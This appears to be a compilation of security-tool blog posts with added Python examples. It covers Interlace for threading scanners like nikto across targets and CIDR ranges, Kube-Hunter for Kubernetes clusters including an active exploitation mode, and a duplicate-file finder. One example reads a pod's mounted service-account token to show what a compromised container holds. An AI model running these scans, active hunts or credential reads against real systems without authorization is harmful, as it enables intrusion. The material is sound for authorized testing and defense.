80,443   Perform a command for both port 80 and port 443

Further information regarding targets (-t or -tL)

Both -t and -tL are processed the same way. You can pass targets the same as you would when using nmap: CIDR notation, dash notation, or a comma-delimited list of targets. A single target list file can also use different notation types per line.

Variable Replacements

The following variables will be replaced in commands at runtime:

_target_    Replaced with the expanded target that the current thread is running against
_host_      Works the same as _target_; the two can be used interchangeably
_output_    Replaced with the output folder variable from Interlace
_port_      Replaced with the expanded port variable from Interlace
_realport_  Replaced with the real port variable from Interlace

Usage Examples

Run Nikto Over Multiple Sites

Let's assume that you had a file targets.txt with the following contents:

bugcrowd.com
hackerone.com

You could use Interlace to run over any number of targets within this file using:

➜ /tmp interlace -tL ./targets.txt -threads 5 -c "nikto --host _target_ > ./_target_-nikto.txt" -v
==============================================
Interlace v1.0 by Michael Skelton (@codingo_)
==============================================
[14:33:23] [THREAD] [nikto --host hackerone.com > ./hackerone.com-nikto.txt] Added to Queue
[14:33:23] [THREAD] [nikto --host bugcrowd.com > ./bugcrowd.com-nikto.txt] Added to Queue

This would run nikto over each host and save the output to a file for each target. Note that because the above example uses the > operator, results are not fed back to the terminal; this is the desired behaviour, as otherwise we would not be able to attribute which target each set of Nikto results belongs to. For applications where you want feedback, simply pass commands as you normally would (or use tee).

Run Nikto Over Multiple Sites and Ports

Using the above example, let's assume you want independent scans to be run for both ports 80 and 443 for the same targets. You would then use the following:

➜ /tmp interlace -tL ./targets.txt -threads 5 -c "nikto --host _target_:_port_ > ./_target_-_port_-nikto.txt" -p 80,443 -v
==============================================
Interlace v1.0 by Michael Skelton (@codingo_)
==============================================
[14:33:23] [THREAD] [nikto --host hackerone.com:80 > ./hackerone.com-80-nikto.txt] Added to Queue
[14:33:23] [THREAD] [nikto --host bugcrowd.com:80 > ./bugcrowd.com-80-nikto.txt] Added to Queue
[14:33:23] [THREAD] [nikto --host bugcrowd.com:443 > ./bugcrowd.com-443-nikto.txt] Added to Queue
[14:33:23] [THREAD] [nikto --host hackerone.com:443 > ./hackerone.com-443-nikto.txt] Added to Queue

Run a List of Commands against Target Hosts

Often with penetration tests there is a list of commands you want to run on nearly every job. Assuming that list includes testssl.sh, nikto, and sslscan, you could save a command list with the following in a file called commands.txt:

nikto --host _target_:_port_ > _output_/_target_-nikto.txt
sslscan _target_:_port_ > _output_/_target_-sslscan.txt
testssl.sh _target_:_port_ > _output_/_target_-testssl.txt

If you were then given a target, example.com, you could run each of these commands against it using:

interlace -t example.com -o ~/Engagements/example/ -cL ./commands.txt -p 80,443

This would then run nikto, sslscan, and testssl.sh for both port 80 and 443 against example.com and save the files into your engagements folder. Note that, because these output file names do not include _port_, the port 443 run of each tool overwrites the port 80 run; include _port_ in the file name (as in the previous example) if you want both kept.

CIDR Notation with an Application That Doesn't Support It

Interlace automatically expands CIDR notation when starting threads (unless the --no-cidr flag is passed). This allows you to pass CIDR notation to a variety of applications. To run a virtual host scan against every target within 192.168.12.0/24 using a direct command you could use:

interlace -t 192.168.12.0/24 -c "vhostscan -t _target_ -oN _output_/_target_-vhosts.txt" -o ~/scans/ -threads 50

This is despite VHostScan not having any inbuilt CIDR notation support. Since Interlace expands the notation before building a queue of threads, VHostScan for all intents and purposes only receives a list of direct IP addresses to scan.

Glob Notation with an Application That Doesn't Support It

Interlace automatically expands glob ranges when starting threads. This allows you to pass glob ranges to a variety of applications. To run a virtual host scan against every target within 192.168.12.* using a direct command you could use:

interlace -t 192.168.12.* -c "vhostscan -t _target_ -oN _output_/_target_-vhosts.txt" -o ~/scans/ -threads 50

Yet again, VHostScan does not have any inbuilt glob range support. (Quote or escape the * if your shell would otherwise expand it against files in the current directory.)

Threading Support for an Application That Doesn't Support It

Run a virtual host scan against each host in a file (target-list.txt), whilst also limiting scans to a maximum of 50 threads at any one time. This could be done using a direct command:

interlace -tL ./target-list.txt -c "vhostscan -t _target_ -oN _output_/_target_-vhosts.txt" -o ~/scans/ -threads 50

Or, alternatively, to run the same command as above but using a command file:

interlace -cL ./vhosts-commands.txt -tL ./target-list.txt -threads 50 -o ~/scans

This presumes that the contents of the command file is:

vhostscan -t _target_ -oN _output_/_target_-vhosts.txt

This would output a file for each target in the specified output folder. You could also run multiple commands simply by adding them to the command file.

Authors and Thanks

Originally written by Michael Skelton (codingo) and Sajeeb Lohani (sml555) with help from Charelle Collett (@Charcol0x89) for threading refactoring and overall approach, and Luke Stephens (hakluke) for testing and approach.

Download Interlace
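The target and port expansion, variable substitution and bounded threading described in the Interlace sections above, as an added, runnable example. This is not Interlace's own code: the function names, the SAFE_HOST check and the sample targets are this example's assumptions. It goes slightly beyond the text by refusing to splice a target containing shell metacharacters into the command line, since (as the nikto examples show) the commands have to run through a shell for redirection to work, so a hostile line in a target file would otherwise execute as a command.

```python
# Added example, not Interlace's own code: expansion and substitution machinery
# of the kind the text describes. Targets in CIDR (192.168.12.0/24), glob
# (192.168.12.*), dash (10.0.0.1-5) or comma notation become hosts; ports in
# single/comma/dash notation become integers; _target_/_host_/_port_/_output_
# are substituted into command templates run under a bounded thread pool.
# All names here are this example's own assumptions.
import ipaddress
import itertools
import re
import subprocess
from concurrent.futures import ThreadPoolExecutor

# Assumption: a host must look like a DNS name or IP before it is spliced into a
# shell command line (commands run via a shell so "> file" redirection works).
SAFE_HOST = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.\-]*$")


def expand_ports(spec):
    """'80' -> [80]; '80,443' -> [80, 443]; '1-3' -> [1, 2, 3]."""
    ports = []
    for part in spec.split(","):
        part = part.strip()
        if "-" in part:
            lo, hi = (int(x) for x in part.split("-", 1))
            ports.extend(range(lo, hi + 1))
        elif part:
            ports.append(int(part))
    return ports


def expand_target(token, expand_cidr=True):
    """Expand one target token (one -t value or one line of a -tL file)."""
    token = token.strip()
    if not token:
        return []
    if "/" in token:                                   # CIDR notation
        if not expand_cidr:                            # the --no-cidr behaviour
            return [token]
        return [str(h) for h in ipaddress.ip_network(token, strict=False).hosts()]
    octets = token.split(".")
    if len(octets) == 4 and all(o == "*" or re.fullmatch(r"\d+(-\d+)?", o) for o in octets):
        ranges = []                                    # glob / dash notation, per octet
        for o in octets:
            if o == "*":
                ranges.append(range(256))
            elif "-" in o:
                lo, hi = (int(x) for x in o.split("-"))
                ranges.append(range(lo, hi + 1))
            else:
                ranges.append([int(o)])
        return [".".join(map(str, c)) for c in itertools.product(*ranges)]
    return [token]                                     # hostname or single IP


def expand_targets(spec, expand_cidr=True):
    """Comma-separated spec -> flat host list, in order, duplicates removed."""
    seen, hosts = set(), []
    for tok in spec.split(","):
        for h in expand_target(tok, expand_cidr):
            if h not in seen:
                seen.add(h)
                hosts.append(h)
    return hosts


def build_commands(templates, hosts, ports, output_dir):
    """templates x hosts x ports with variables substituted; _host_ == _target_."""
    for host in hosts:
        if not SAFE_HOST.match(host):
            raise ValueError("refusing to shell out with suspicious target %r" % host)
    cmds = []
    for template in templates:
        for host in hosts:
            for port in ports or [None]:
                cmd = (template.replace("_target_", host).replace("_host_", host)
                               .replace("_output_", output_dir.rstrip("/")))
                if port is not None:
                    cmd = cmd.replace("_port_", str(port))
                cmds.append(cmd)
    return cmds


def run_commands(cmds, threads=5, timeout=600, runner=None):
    """Run commands with at most `threads` in flight; returns [(cmd, returncode)].
    `runner` can be swapped (e.g. for a dry-run printer) when testing."""
    def shell_runner(cmd):
        try:
            return subprocess.run(cmd, shell=True, timeout=timeout).returncode
        except subprocess.TimeoutExpired:
            return None                                # the -timeout behaviour
    runner = runner or shell_runner
    with ThreadPoolExecutor(max_workers=threads) as pool:
        return list(zip(cmds, pool.map(runner, cmds)))


if __name__ == "__main__":
    # Constructed sample: the targets and nikto template from the text, as a dry run.
    hosts = expand_targets("bugcrowd.com,hackerone.com")
    cmds = build_commands(["nikto --host _target_:_port_ > _output_/_target_-_port_-nikto.txt"],
                          hosts, expand_ports("80,443"), "./out")
    run_commands(cmds, threads=5, runner=lambda c: print("[THREAD]", c, "Added to Queue") or 0)
```

Replace the dry-run runner with the default to actually execute the commands. The SAFE_HOST check is the important addition: a target list is often data you did not author (a client's scope file, a scraped subdomain list), and every line of it ends up inside a shell string.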

Link: http://feedproxy.google.com/~r/PentestTools/~3/WogS-qr4dno/interlace-easily-turn-single-threaded.html

Kube-Hunter – Hunt For Security Weaknesses In Kubernetes Clusters

Kube-hunter hunts for security weaknesses in Kubernetes clusters. The tool was developed to increase awareness and visibility of security issues in Kubernetes environments. You should NOT run kube-hunter on a Kubernetes cluster you don't own!

Run kube-hunter: kube-hunter is available as a container (aquasec/kube-hunter), and we also offer a web site at kube-hunter.aquasec.com where you can register online to receive a token allowing you to see and share the results online. You can also run the Python code yourself as described below.

Contribute: We welcome contributions, especially new hunter modules that perform additional tests. If you would like to develop your own modules, please read Guidelines For Developing Your First kube-hunter Module.

Hunting

Where should I run kube-hunter?

Run kube-hunter on any machine (including your laptop), select Remote scanning and give the IP address or domain name of your Kubernetes cluster. This gives you an attacker's-eye view of your Kubernetes setup.

You can run kube-hunter directly on a machine in the cluster, and select the option to probe all the local network interfaces.

You can also run kube-hunter in a pod within the cluster. This gives an indication of how exposed your cluster would be in the event that one of your application pods is compromised (through a software vulnerability, for example).

Scanning options

By default, kube-hunter opens an interactive session in which you can select one of the following scan options. You can also specify the scan option from the command line. These are your options:

Remote scanning: to specify remote machines for hunting, select option 1 or use the --remote option.
Example: ./kube-hunter.py --remote some.node.com

Internal scanning: to specify internal scanning, use the --internal option (this scans all of the machine's network interfaces).
Example: ./kube-hunter.py --internal

Network scanning: to specify a CIDR range to scan, use the --cidr option.
Example: ./kube-hunter.py --cidr 192.168.0.0/24

Active Hunting

Active hunting is an option in which kube-hunter will exploit the vulnerabilities it finds in order to explore for further vulnerabilities. The main difference between normal and active hunting is that a normal hunt never changes the state of the cluster, while active hunting can perform state-changing operations on the cluster, which could be harmful. By default, kube-hunter does not do active hunting. To actively hunt a cluster, use the --active flag.
Example: ./kube-hunter.py --remote some.domain.com --active

List of tests

You can see the list of tests with the --list option.
Example: ./kube-hunter.py --list
To see active hunting tests as well as passive ones: ./kube-hunter.py --list --active

Output

To control logging, you can specify a log level using the --log option.
Example: ./kube-hunter.py --active --log WARNING
Available log levels are: DEBUG, INFO (default), WARNING.

To see only a mapping of your nodes' network, run with the --mapping option.
Example: ./kube-hunter.py --cidr 192.168.0.0/24 --mapping
This outputs all the Kubernetes nodes kube-hunter has found.

Deployment

There are three methods for deploying kube-hunter:

On Machine

You can run the kube-hunter Python code directly on your machine.

Prerequisites: you will need python 2.7 and pip installed.

Clone the repository:
git clone git@github.com:aquasecurity/kube-hunter.git

Install module dependencies:
cd ./kube-hunter
pip install -r requirements.txt

If you have Python 3.x in your path as the default, and python2 refers to a Python 2.7 executable, use "python2 -m pip install -r requirements.txt" instead.

Run:
./kube-hunter.py

Container

Aqua Security maintains a containerised version of kube-hunter at aquasec/kube-hunter. This container includes this source code, plus an additional (closed source) reporting plugin for uploading results into a report that can be viewed at kube-hunter.aquasec.com. Please note that running the aquasec/kube-hunter container and uploading report data are subject to additional terms and conditions. The Dockerfile in this repository allows you to build a containerised version without the reporting plugin.

If you run the kube-hunter container with the host network it will be able to probe all the interfaces on the host:
docker run -it --rm --network host aquasec/kube-hunter

Note for Docker for Mac/Windows: be aware that the "host" for Docker for Mac or Windows is the VM within which Docker runs containers. Specifying --network host therefore gives kube-hunter access to the network interfaces of that VM, rather than those of your machine.

By default kube-hunter runs in interactive mode. You can also specify the scanning option with the parameters described above, e.g.:
docker run --rm aquasec/kube-hunter --cidr 192.168.0.0/24

Pod

This option lets you discover what running a malicious container can do/discover on your cluster. This gives a perspective on what an attacker could do if they were able to compromise a pod, perhaps through a software vulnerability. This may reveal significantly more vulnerabilities.

The job.yaml file defines a Job that will run kube-hunter in a pod, using default Kubernetes pod access settings. Run the job with kubectl create with that yaml file. Find the pod name with kubectl describe job kube-hunter. View the test results with kubectl logs <pod name>.

Download Kube-Hunter
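What "default Kubernetes pod access settings" hand to a compromised container, as an added example that is not kube-hunter's code or one of its hunter modules. It relies on two standard Kubernetes behaviours: the kubelet injects KUBERNETES_SERVICE_HOST and KUBERNETES_SERVICE_PORT into every pod's environment, and unless automountServiceAccountToken is set to false the service account's token, CA certificate and namespace are mounted under /var/run/secrets/kubernetes.io/serviceaccount. The function names, the report layout and the sample token directory are this example's own assumptions; nothing here touches the network.

```python
# Added example, not kube-hunter's code: a minimal "compromised pod" inventory
# of what a container gets by default, which is what the Pod deployment mode
# above measures from the inside. Names and sample data are this example's own.
import os
import tempfile

SA_DIR = "/var/run/secrets/kubernetes.io/serviceaccount"   # standard token mount


def pod_exposure(env, sa_dir=SA_DIR):
    """Describe what a process in this pod can reach and authenticate with.
    `env` is a mapping such as os.environ; `sa_dir` is the token mount directory."""
    report = {"api_server": None, "token_mounted": False, "namespace": None, "findings": []}
    host, port = env.get("KUBERNETES_SERVICE_HOST"), env.get("KUBERNETES_SERVICE_PORT")
    if host and port:
        report["api_server"] = "https://%s:%s" % (host, port)
        report["findings"].append("API server address is discoverable from the environment")
    token_path = os.path.join(sa_dir, "token")
    if os.path.isfile(token_path):
        with open(token_path) as f:
            token = f.read().strip()
        if token:
            report["token_mounted"] = True
            report["findings"].append("service account token is mounted; the pod can authenticate to the API server")
    ns_path = os.path.join(sa_dir, "namespace")
    if os.path.isfile(ns_path):
        with open(ns_path) as f:
            report["namespace"] = f.read().strip()
    if report["api_server"] and report["token_mounted"]:
        report["findings"].append("review the RBAC bound to this service account: it decides what the token can do")
    return report


def build_sample_pod_fs(with_token=True):
    """Constructed stand-in for the token mount so the example runs outside a cluster."""
    d = tempfile.mkdtemp(prefix="sa-")
    if with_token:
        with open(os.path.join(d, "token"), "w") as f:
            f.write("eyJhbGciOiJSUzI1NiJ9.constructed-sample.signature")   # not a real token
        with open(os.path.join(d, "namespace"), "w") as f:
            f.write("default")
    return d


if __name__ == "__main__":
    # Inside a real pod you would call pod_exposure(os.environ); here the inputs are constructed.
    env = {"KUBERNETES_SERVICE_HOST": "10.96.0.1", "KUBERNETES_SERVICE_PORT": "443"}
    for finding in pod_exposure(env, build_sample_pod_fs())["findings"]:
        print("[!]", finding)
```

The fix for the second finding, when a workload does not need the API, is automountServiceAccountToken: false on the pod spec or the ServiceAccount; for workloads that do need it, the exposure is bounded by the RBAC roles bound to that service account, which is what the third finding asks you to review.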

Link: http://feedproxy.google.com/~r/PentestTools/~3/Dr1bT8peAAc/kube-hunter-hunt-for-security.html

Doppelganger – Python Script To Scan Duplicate Copies In A Given Directory

Doppelganger is a Python script to scan for duplicate copies in a given directory. The tool compares not only file names but also file hashes, to ensure there are no false search results.

Features
- Find duplicate music
- Find duplicate videos
- Find duplicate pictures
- Find duplicate documents

How Doppelganger searches for duplicate files

How to Install and Run in Linux

[1] Enter the following command in the terminal to download it:
git clone https://github.com/Sameera-Madhushan/Doppelganger
[2] After downloading the program, enter the following command to navigate to the Doppelganger directory and list its contents:
cd Doppelganger && ls
[3] Now run the script with the following command:
python3 doppelganger.py

How to Install and Run in Windows

[1] Download and run the Python 3.7 setup file from Python.org. In the Python 3.7 installer, enable "Add Python 3.7 to PATH".
[2] Download and run the Git setup file from Git-scm.com, choosing "Use Git from Windows Command Prompt".
[3] After that, run Command Prompt and enter these commands:
git clone https://github.com/Sameera-Madhushan/Doppelganger
cd Doppelganger
python3 doppelganger.py

Download Doppelganger
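Content-based duplicate detection of the kind the Doppelganger description above relies on (names are not enough; hashes decide), as an added example that is not Doppelganger's own code. It goes a little beyond the text: files are bucketed by size first so that only same-size candidates are hashed, symlinks are skipped so a link and its target are not reported as a pair, and a second function lists the same-name-different-content files that a name-only scan would wrongly report. The function names, the extension filter and the constructed sample tree are this example's assumptions.

```python
# Added example, not Doppelganger's own code: duplicate detection by content.
# Group by size first (cheap), hash only same-size files, never trust names.
import hashlib
import os
import tempfile
from collections import defaultdict


def file_digest(path, algo="sha256", chunk_size=1 << 20):
    """Hash a file in chunks so large videos do not have to fit in memory."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def find_duplicates(root, extensions=None):
    """Groups of paths (relative to root) whose contents are byte-for-byte equal.
    `extensions`, e.g. {".mp3", ".flac"}, restricts the scan to one file type,
    like the tool's music/video/picture/document modes (an assumption here)."""
    by_size = defaultdict(list)
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if extensions and os.path.splitext(name)[1].lower() not in extensions:
                continue
            path = os.path.join(dirpath, name)
            if os.path.islink(path):           # a symlink and its target are not a duplicate pair
                continue
            by_size[os.path.getsize(path)].append(path)
    groups = []
    for paths in by_size.values():
        if len(paths) < 2:                     # unique size => cannot have a duplicate
            continue
        by_hash = defaultdict(list)
        for p in paths:
            by_hash[file_digest(p)].append(os.path.relpath(p, root))
        groups.extend(sorted(g) for g in by_hash.values() if len(g) > 1)
    return sorted(groups)


def same_name_different_content(root):
    """Files sharing a basename but differing in content: exactly the false
    positives a name-only comparison would report."""
    by_name = defaultdict(list)
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            by_name[name].append(os.path.join(dirpath, name))
    suspects = []
    for name, paths in by_name.items():
        if len(paths) > 1 and len({file_digest(p) for p in paths}) > 1:
            suspects.append((name, sorted(os.path.relpath(p, root) for p in paths)))
    return sorted(suspects)


def build_sample_tree():
    """Constructed sample directory (not real data): three identical files under two
    names, one same-named file of the same size but different content, one unique."""
    root = tempfile.mkdtemp(prefix="doppelganger-example-")
    sample = {
        "a/song.mp3": b"identical audio bytes",
        "b/song.mp3": b"identical audio bytes",
        "c/other.mp3": b"identical audio bytes",
        "d/song.mp3": b"different audio bytes",   # same length, different hash
        "e/notes.txt": b"unique text",
    }
    for rel, data in sample.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(data)
    return root


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else build_sample_tree()
    for group in find_duplicates(root):
        print("duplicate set:", ", ".join(group))
    for name, paths in same_name_different_content(root):
        print("same name, different content:", name, "->", ", ".join(paths))
```

Run it with a directory argument to scan real data, or with no argument to see it work on the constructed tree. The size-first bucketing is what keeps this usable on a large media library: a file whose size is unique is never opened.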

Link: http://feedproxy.google.com/~r/PentestTools/~3/cKnwHPtVRVY/doppelganger-python-script-to-scan.html